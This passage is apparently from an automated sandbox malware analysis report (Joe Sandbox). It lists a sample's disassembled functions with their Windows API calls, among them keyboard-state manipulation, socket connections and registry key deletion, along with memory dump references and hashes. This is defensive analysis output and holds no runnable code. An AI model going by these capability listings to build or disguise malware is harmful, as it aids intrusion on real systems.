                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004DF910
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 3522835683-2766056989
                                                                                                                                                                            • Opcode ID: fc45a6be7c476e17f3bbb79dea8bf40041fd76585e8f9519fd412287e8db5c4c
                                                                                                                                                                            • Instruction ID: cdc1847e24a1c0b12c1a1c8b5b8b8ce01c3415cde6cf37935bfe5ed5a687577f
                                                                                                                                                                            • Opcode Fuzzy Hash: fc45a6be7c476e17f3bbb79dea8bf40041fd76585e8f9519fd412287e8db5c4c
                                                                                                                                                                            • Instruction Fuzzy Hash: 2861BDB4A006199FCB14EF55C4909AEBBF4FF48314B14846FE84AAB351DB38AD44CB99
                                                                                                                                                                            Function 004C145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32(?), ref: 004C149C
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 004C14B1
                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 004C1512
                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004C1540
                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004C155F
                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 004C15A5
                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004C15C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                            • Opcode ID: 08d4a35c794cdd16f8f38232b9f37bf2c5bd8d8d2019646ff9fb4ac2c4ce274c
                                                                                                                                                                            • Instruction ID: 04ff03e7dfbbeeae78c322dd6ec96d0e855919072ce8d297cdab8431ab4cafb5
                                                                                                                                                                            • Opcode Fuzzy Hash: 08d4a35c794cdd16f8f38232b9f37bf2c5bd8d8d2019646ff9fb4ac2c4ce274c
                                                                                                                                                                            • Instruction Fuzzy Hash: 3F51D0A4A047D53EFB7646348C45FBBBEA95B47304F08848EE1D58A9E3C29CEC84D758
                                                                                                                                                                            Function 004C1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32(00000000), ref: 004C12B5
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 004C12CA
                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 004C132B
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004C1357
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004C1374
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004C13B8
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004C13D9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                            • Opcode ID: 70454d01ecf2926c44a49265120c5c16bf25cf1fb36737440eed1ff563591641
                                                                                                                                                                            • Instruction ID: 2b9f22da153334167a074b4135abd31f57f64485e62a8bf49d428a774cd4135b
                                                                                                                                                                            • Opcode Fuzzy Hash: 70454d01ecf2926c44a49265120c5c16bf25cf1fb36737440eed1ff563591641
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D5102A45042D53DFB3683248C41F7BBFA95B07308F08848FE5D45A9E3D398AC98D768
                                                                                                                                                                            Function 004C589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcsncpy$LocalTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2945705084-0
                                                                                                                                                                            • Opcode ID: 4a766894b74ffedd16b1f577123fe6127f94e78b5e5ad4ba6e25379d89ff6179
                                                                                                                                                                            • Instruction ID: df3505c19c0c678480a974a7040f82348ad3354ce24116ec8ed2cc99e4a2a79a
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a766894b74ffedd16b1f577123fe6127f94e78b5e5ad4ba6e25379d89ff6179
                                                                                                                                                                            • Instruction Fuzzy Hash: 124195A9C2051476CB50FBB5888AACF73B89F05710F50895BF918E3112E638E755C7AD
                                                                                                                                                                            Function 004BDA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004BDAC5
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004BDAFB
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004BDB0C
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004BDB8E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                            • String ID: ,,O$DllGetClassObject
                                                                                                                                                                            • API String ID: 753597075-4186158689
                                                                                                                                                                            • Opcode ID: b5bd8886f719af11c0b6d5244f05b5e5bd62a584785222a6eb4efe2ec613dbe7
                                                                                                                                                                            • Instruction ID: 24a84b5f3510179bca5da19524ba56224a99e8bafd626e384c8974350e654c64
                                                                                                                                                                            • Opcode Fuzzy Hash: b5bd8886f719af11c0b6d5244f05b5e5bd62a584785222a6eb4efe2ec613dbe7
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F415E71A04208DFDB15CF55C884ADABBA9EF44310F1581AEA9099F206E7B9E944CBA4
                                                                                                                                                                            Function 004C38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004C48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004C38D3,?), ref: 004C48C7
                                                                                                                                                                              • Part of subcall function 004C48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004C38D3,?), ref: 004C48E0
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 004C38F3
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004C390F
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 004C3927
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004C396F
                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 004C39DB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                            • API String ID: 1377345388-1173974218
                                                                                                                                                                            • Opcode ID: 1b4a96f0ba28226505945f78004e84e71ddc98ce4579aa01c88731d8a0b46cc1
                                                                                                                                                                            • Instruction ID: 94c5f14b2c17a6ce32a3ffc77a57f7deaf8a8c257c393ce93cf2b99653a39d89
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b4a96f0ba28226505945f78004e84e71ddc98ce4579aa01c88731d8a0b46cc1
                                                                                                                                                                            • Instruction Fuzzy Hash: CC41B3B54083849EC791EF65C481EEFB7E8AF88345F00482FF499C3261EA78D648C75A
                                                                                                                                                                            Function 004E7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004E7519
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004E75C0
                                                                                                                                                                            • IsMenu.USER32(?), ref: 004E75D8
                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004E7620
                                                                                                                                                                            • DrawMenuBar.USER32 ref: 004E7633
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 3866635326-4108050209
                                                                                                                                                                            • Opcode ID: d52951708c2afede844b65a175d1131fa290eab27c59e443bfc22bcd150c5d9b
                                                                                                                                                                            • Instruction ID: 595d2b857bba98eea9d1e5b8f6af6707224ef26bc29900853ec0a4ac5522ed84
                                                                                                                                                                            • Opcode Fuzzy Hash: d52951708c2afede844b65a175d1131fa290eab27c59e443bfc22bcd150c5d9b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9E416A70A04688EFDB20DF65D884EAABBF8FF05325F04802AE9159B351D734AD05CF94
                                                                                                                                                                            Function 004E122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 004E125C
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004E1286
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004E133D
                                                                                                                                                                              • Part of subcall function 004E122D: RegCloseKey.ADVAPI32(?), ref: 004E12A3
                                                                                                                                                                              • Part of subcall function 004E122D: FreeLibrary.KERNEL32(?), ref: 004E12F5
                                                                                                                                                                              • Part of subcall function 004E122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 004E1318
                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 004E12E0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 395352322-0
                                                                                                                                                                            • Opcode ID: 1d8db7f272e226a8b7ed59aa34ab249af91085aee6b102321820ddec4435252f
                                                                                                                                                                            • Instruction ID: a557411ca81ecd302f5ca9173cf034f7b60b09013b12d5c189a09fa0a7a589bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d8db7f272e226a8b7ed59aa34ab249af91085aee6b102321820ddec4435252f
                                                                                                                                                                            • Instruction Fuzzy Hash: F9314F71941149BFEB14DF91DC85AFFB7BCEF08301F00017AE901E2251D6745F499AA8
                                                                                                                                                                            Function 004E653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004E655B
                                                                                                                                                                            • GetWindowLongW.USER32(00D355D0,000000F0), ref: 004E658E
                                                                                                                                                                            • GetWindowLongW.USER32(00D355D0,000000F0), ref: 004E65C3
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004E65F5
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004E661F
                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004E6630
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004E664A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                                                            • Opcode ID: a098a940d2a48b8991f6ec4c5d75df15f166e6281d579bd3788386b822dd2ac6
                                                                                                                                                                            • Instruction ID: c074864c61cf3dad1b503ba2b0d3f4e9d0d13c3f17f54ec61ff47e800fef8f29
                                                                                                                                                                            • Opcode Fuzzy Hash: a098a940d2a48b8991f6ec4c5d75df15f166e6281d579bd3788386b822dd2ac6
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A310530704290AFDB208F2AEC84F5637E1FB6A395F1A0169F5118F2B6CB65A845DB49
                                                                                                                                                                            Function 004D6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004D80A0: inet_addr.WSOCK32(00000000), ref: 004D80CB
                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004D64D9
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D64E8
                                                                                                                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004D6521
                                                                                                                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 004D652A
                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 004D6534
                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 004D655D
                                                                                                                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004D6576
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 910771015-0
                                                                                                                                                                            • Opcode ID: 5c4676d9915013db965f0142058416fba7b4ee7344c85d23acfd5762b0e45491
                                                                                                                                                                            • Instruction ID: 1e613ab3ab59c3efcb4bf9edda3fa29b801ab62ec48c10f6e5c3bd606600b5db
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c4676d9915013db965f0142058416fba7b4ee7344c85d23acfd5762b0e45491
                                                                                                                                                                            • Instruction Fuzzy Hash: D231C131600118ABDB10AF64DC95BBE7BADEB44314F05806FFD059B391DB78AD48CB6A
                                                                                                                                                                            Function 004BE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004BE0FA
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004BE120
                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 004BE123
                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 004BE144
                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 004BE14D
                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 004BE167
                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004BE175
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                            • Opcode ID: 302400ec4da89838999196801bad62ecec9ae813c78d2bf6a46fdab8eb2edb82
                                                                                                                                                                            • Instruction ID: 452e47353e0023dbac09ce3c101ba14e02803658a42c354b7e5ab61e6081f02a
                                                                                                                                                                            • Opcode Fuzzy Hash: 302400ec4da89838999196801bad62ecec9ae813c78d2bf6a46fdab8eb2edb82
                                                                                                                                                                            • Instruction Fuzzy Hash: 9021A171600208AFDB10AFADDC88CEB77ECEB49760B108136F914CB2A1DA74DC458B78
                                                                                                                                                                            Function 004E783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00461D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00461D73
                                                                                                                                                                              • Part of subcall function 00461D35: GetStockObject.GDI32(00000011), ref: 00461D87
                                                                                                                                                                              • Part of subcall function 00461D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00461D91
                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004E78A1
                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004E78AE
                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004E78B9
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004E78C8
                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004E78D4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                            • Opcode ID: ae0ff74e2ec6dd6dc68a22fd13f515ee504dd4ab7dba6826a901ec387a242a83
                                                                                                                                                                            • Instruction ID: 35850fbe7d4ba1d024f793a52dbbe99fa337e20bc81d1c993841cef048f39b05
                                                                                                                                                                            • Opcode Fuzzy Hash: ae0ff74e2ec6dd6dc68a22fd13f515ee504dd4ab7dba6826a901ec387a242a83
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E1190B2110219BFEF159F61CC85EE77F6DFF087A8F014115BA04A61A0C776AC21DBA4
                                                                                                                                                                            Function 004841C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00484292,?), ref: 004841E3
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004841EA
                                                                                                                                                                            • EncodePointer.KERNEL32(00000000), ref: 004841F6
                                                                                                                                                                            • DecodePointer.KERNEL32(00000001,00484292,?), ref: 00484213
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
